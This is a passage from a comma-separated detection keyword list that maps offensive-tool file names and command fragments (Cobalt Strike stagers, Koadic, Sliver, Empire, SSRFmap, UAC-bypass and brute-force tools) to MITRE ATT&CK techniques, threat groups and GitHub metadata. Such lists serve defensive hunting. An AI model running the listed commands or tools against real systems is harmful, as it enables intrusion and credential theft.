T1059.003 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential 
Access,https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer,1,1,N/A,9,3,254,81,2020-11-21T07:10:26Z,2020-04-25T07:20:14Z -*ssh-putty-brute.ps1*,offensive_tool_keyword,SSH-PuTTY-login-bruteforcer,Turn PuTTY into an SSH login bruteforcing tool.,T1110.002 - T1059.003 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer,1,1,N/A,9,3,254,81,2020-11-21T07:10:26Z,2020-04-25T07:20:14Z -*SSH-PuTTY-login-bruteforcer*,offensive_tool_keyword,SSH-PuTTY-login-bruteforcer,Turn PuTTY into an SSH login bruteforcing tool.,T1110.002 - T1059.003 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer,1,1,N/A,9,3,254,81,2020-11-21T07:10:26Z,2020-04-25T07:20:14Z -*sshuttle -r *0.0.0.0/24*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sslstrip*,offensive_tool_keyword,sslstrip,sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.,T1557.001 - T1573 - T1559 - T1542 - T1552,TA0002 - TA0011 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/moxie0/sslstrip,1,1,N/A,N/A,10,1821,418,2021-05-29T01:53:12Z,2011-04-24T06:40:08Z -*SspiUacBypass.cpp*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*SspiUacBypass.exe*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z 
-*SspiUacBypass-main*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*SSploitEnumeration*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitEnumerationDomain*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitExecution_DynamicInvoke*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitExecution_Injection*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitLateralMovement*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitPersistence*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SSploitPrivilegeEscalation*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*sspr2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*--ssrf --gopher --encode --scan-action filter-bypass*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*ssrfmap -r *.txt -p id -m readfiles*portscan*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SSRFmap*,offensive_tool_keyword,SSRFmap,SSRF are often used to 
leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.,T1210.001 - T1190 - T1191 - T1505 - T1213,TA0007 - TA0002 - TA0008 - TA0001,N/A,N/A,Web Attacks,https://github.com/swisskyrepo/SSRFmap,1,0,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -*ssrfmap.py*,offensive_tool_keyword,SSRFmap,Automatic SSRF fuzzer and exploitation tool,T1210 - T1211 - T1212 - T1574,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/swisskyrepo/SSRFmap,1,1,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -*StackCrypt-main*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.cpp*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.exe*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.sln*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*StackEncrypt.vcxproj*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*stage.obfuscate*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*stage_smartinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x64_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x64_strrep1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x86_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*stage_transform_x86_strrep1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*Stage-gSharedInfoBitmap*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stageless payload*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,0,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*StageListenerCmd*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*stager/js/bitsadmin *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/disk*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/mshta*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/regsvr *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/rundll32_js *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/wmic *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager_bind_pipe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*stager_bind_pipe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*stager_bind_tcp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
